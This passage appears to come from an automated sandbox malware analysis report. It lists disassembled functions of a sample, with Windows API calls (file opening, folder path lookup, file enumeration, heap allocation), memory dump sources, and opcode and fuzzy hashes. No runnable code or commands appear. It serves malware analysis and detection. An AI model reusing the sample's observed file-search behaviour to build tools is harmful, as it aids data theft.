                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,001E0E00,00000000,?), ref: 001D79B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001D79B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,001E0E00,00000000,?), ref: 001D79C4
                              • wsprintfA.USER32 ref: 001D79F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: 4566c0c5630167fd432b44f1eb58d29fa0f20bf0445cd0f7b1f2eb23497f76dd
                              • Instruction ID: 0ab9fea244ec4bee779cbfd7f8d3f6e165031601536dd32e1e8b216a63350e9a
                              • Opcode Fuzzy Hash: 4566c0c5630167fd432b44f1eb58d29fa0f20bf0445cd0f7b1f2eb23497f76dd
                              • Instruction Fuzzy Hash: 18112AB2904218ABCB14DFD9DE45BBEB7F8FB4CB11F10461AF645A2280E3395950C7B5
                              Function 001D92E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(001D3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,001D3AEE,?), ref: 001D92FC
                              • GetFileSizeEx.KERNEL32(000000FF,001D3AEE), ref: 001D9319
                              • CloseHandle.KERNEL32(000000FF), ref: 001D9327
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID:
                              • API String ID: 1378416451-0
                              • Opcode ID: 08099dfe31450bfc808f2c685bd8dddc39a2068358873499e6dc50610fa1198e
                              • Instruction ID: d896ed4538183d2f3407ad12337edd67110cb4240434a819546fcd7ee07bf6dd
                              • Opcode Fuzzy Hash: 08099dfe31450bfc808f2c685bd8dddc39a2068358873499e6dc50610fa1198e
                              • Instruction Fuzzy Hash: BEF03779E40308BBDB14DBB0DD49B9E77B9BB48720F11C664BA51A72C0D670AA118B45
                              Function 001DC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • __getptd.LIBCMT ref: 001DC74E
                                • Part of subcall function 001DBF9F: __amsg_exit.LIBCMT ref: 001DBFAF
                              • __getptd.LIBCMT ref: 001DC765
                              • __amsg_exit.LIBCMT ref: 001DC773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 001DC797
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: cb479c9beb2b014b2f6e3025a8327a9fe5012b88cbff9b799719ce3706f15b1f
                              • Instruction ID: 4dc162f7a3ba3a4bd18b9887dda62db0abd55765581348c6399eda4a01361676
                              • Opcode Fuzzy Hash: cb479c9beb2b014b2f6e3025a8327a9fe5012b88cbff9b799719ce3706f15b1f
                              • Instruction Fuzzy Hash: 41F0B432D09702DBDB21BBB8988774F33A06F10721F22494BF406AB3D2DB645941DED6
                              Function 001D4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001D8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 001D4F7A
                              • lstrcat.KERNEL32(?,001E1070), ref: 001D4F97
                              • lstrcat.KERNEL32(?,014A9268), ref: 001D4FAB
                              • lstrcat.KERNEL32(?,001E1074), ref: 001D4FBD
                                • Part of subcall function 001D4910: wsprintfA.USER32 ref: 001D492C
                                • Part of subcall function 001D4910: FindFirstFileA.KERNEL32(?,?), ref: 001D4943
                                • Part of subcall function 001D4910: StrCmpCA.SHLWAPI(?,001E0FDC), ref: 001D4971
                                • Part of subcall function 001D4910: StrCmpCA.SHLWAPI(?,001E0FE0), ref: 001D4987
                                • Part of subcall function 001D4910: FindNextFileA.KERNEL32(000000FF,?), ref: 001D4B7D
                                • Part of subcall function 001D4910: FindClose.KERNEL32(000000FF), ref: 001D4B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: 8e9c3a7ca87b95d7847e12d0ab6f5baea4106d73cfe3b36bd922bee3b51cfd47
                              • Instruction ID: 1fdca972dad2863ce0813c80bd8ba4c9b7a84d70b17c8001a18f272f1f79a641
                              • Opcode Fuzzy Hash: 8e9c3a7ca87b95d7847e12d0ab6f5baea4106d73cfe3b36bd922bee3b51cfd47
                              • Instruction Fuzzy Hash: 6B21987690030867C754FBB0DD56EED333CABA9300F004569B699A3181EF74DAD98B96